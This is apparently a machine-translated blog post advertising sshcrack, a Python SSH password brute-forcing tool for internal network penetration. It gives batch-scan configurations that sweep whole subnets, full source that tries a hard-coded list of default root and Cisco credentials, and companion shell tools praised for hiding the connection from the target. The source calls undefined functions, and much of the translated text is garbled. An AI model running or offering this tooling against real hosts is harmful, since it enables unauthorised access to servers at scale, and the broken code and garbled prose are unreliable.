[Original] network SSH password blasting tool sshcrack (complex batch Cscan weak password detection) [original] dedicated network permeation SSH Tools sshcmd / sshshell / ssh and password cracking open SSH Kali

0x000 Foreword

sshcrack SSH password blasting is under a command line tool, suitable for detecting the seepage SSH password

Of course, can also be used outside the network SSH password blasting, support Windows / Linux, other systems not measured. Tip1

0x001 directory

1.sshcrack usage

2.Cscan batch scanning

3. Run the SSH connection

4.sshcrack source

5. Download

0x002 usage

Specifies the SSH server password detection

Weak password detection (-crack user passwords can just write, write a list of secret accounts since dead) 
C: \ the Users \ K8team \ Desktop \ the Upload> 22 root k8gege -crack sshcrack.exe 192.168.1.106 
192.168.1.106 22 root toor LoginOK 

single password authentication (-test) 
C: \ the Users \ K8team \ Desktop \ Upload> 22 is the root toor -test sshcrack.exe 192.168.1.106 
192.168.1.106 22 is the root toor LoginOK

 

0x003 batch SSH server password detection

0. The Cscan.exe Cscan.ini sshcrack.exe placed in the same directory

Cscan.ini follows

1. Blasting weak password (password or no current account acquired more dense)

[Cscan]
exe=sshcrack.exe
arg=$ip$ 22 "" "" -crack

2. Verify a password known (the rapid detection of whether other machines using the same network account secret)

[Cscan]
exe=sshcrack.exe
arg=$ip$ 22 root k8gege -test

 Scanning a single segment 3.Cscan C / B segment / A machine section

cscan 192.168.1.108 (Single the IP) 
192.168.1.108/24 (C para) Cscan 
Cscan 192.168.1.108/16 (segment B) 
Cscan 192.168.1.108/8 (segment A)

Batch 4.Cscan IP / Batch C section / paragraph B Batch scanning

New ip24.txt or ip16.tx or ip.txt file, and then to enter Cscan (no other parameters)

The following Cscan.ini no port is specified, because the non-identified by K8portscan port 22

Do not specify a port means ip.txt need to fill in the corresponding SSH on port

0x004 connection SSH command execution

1.sshshell interactive connection

sshshell.exe 192.168.1.106 22 root toor

sshshell.exe interactive single-file SSH connection means (similar advantages can maintain session putty, putty similar shortcomings remain connected)

2.sshcmd non-interactive command line

Ends are advantages to logout command session immediately (i.e., do not see the target network connection), a dedicated network penetration

3. penetration Edition SSH connectivity tools GUI version

When the advantages are immediately End Run logoff session (i.e., do not see the target network connection), a dedicated penetration, the network may be out of the proxy or external network connection SSH

Of course, it can also be used for daily use VPS management, GUI version with file management, support for upload and download single files or entire directories

 

0x005 sshcrack source

Recommend password-coded for easy batch scanning with Cscan, or else every one sweep, sshcrack to read about the password list, it may affect the efficiency of batch.

以下是例子，大家可自行修改，根据自身项目添加对应密码字典，脚本还需完善，如跑出root密码后停止检测root用户或者不再爆破。

#sshcrack 1.0
#author: k8gege
#https://www.cnblogs.com/k8gege
#https://github.com/k8gege
import paramiko
import sys
import logging

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
logging.raiseExceptions=False
def checkSSH(host,port,user,pwd):
	try:
		ssh.connect(host,port,user,pwd)
		print host+' '+port+' '+user+' '+pwd+' LoginOK'
		checkDns()
		checkPing()
	except:
		pass
host=sys.argv[1]
port=sys.argv[2]
user=sys.argv[3]
pwd=sys.argv[4]
type=sys.argv[5]
if type=='-test':
	checkSSH(host,port,user,pwd)
elif type=='-crack':
	checkSSH(host,port,'root','123456')
	checkSSH(host,port,'root','cisco')
	checkSSH(host,port,'root','Cisco')
	checkSSH(host,port,'admin','123456')
	checkSSH(host,port,'cisco','123456')
	checkSSH(host,port,'cisco','cisco')
	checkSSH(host,port,'Cisco','Cisco')
	checkSSH(host,port,'cisco','cisco123')
	checkSSH(host,port,'admin','admin')
	checkSSH(host,port,'root','Admin')
	checkSSH(host,port,'root','toor')
	checkSSH(host,port,'root','Admin123')
	checkSSH(host,port,'root','system')
	checkSSH(host,port,'root','system123')
	checkSSH(host,port,'root','System')
	checkSSH(host,port,'root','System123')
	checkSSH(host,port,'root','Admin123!@#')
	checkSSH(host,port,'root','root123!@#')
	checkSSH(host,port,'root','root2019')
	checkSSH(host,port,'root','root2018')
	checkSSH(host,port,'root','root2017')
	checkSSH(host,port,'root','root2016')
	checkSSH(host,port,'root','root2015')
	checkSSH(host,port,'root','root2014')
	checkSSH(host,port,'root','root2013')
	checkSSH(host,port,'root','root2012')
else:
	checkSSH(host,port,user,pwd)

0x006 工具下载

https://github.com/k8gege/sshshell

https://github.com/k8gege/K8tools

https://github.com/k8gege/K8CScan

 

Tip1: Python写的程序一定跨平台？

Python虽是跨平台语言,但不见得Python写的程序一定支持所有系统

支不支持主要是看写代码的人，比如有些依赖包仅Linux下或Win下可用

你直接调用人家的包，未做任何修改，你认为一定是跨平台吗？？？

就算是只用原生包写的功能,也不能保证完全兼容

有些功能针对于不同系统需做不同的处理

 

Tip2: SSH连接工具详细说明

[原创]内网渗透专用SSH连接工具sshcmd/sshshell/ssh密码破解以及Kali开启SSH

https://www.cnblogs.com/k8gege/p/10991264.html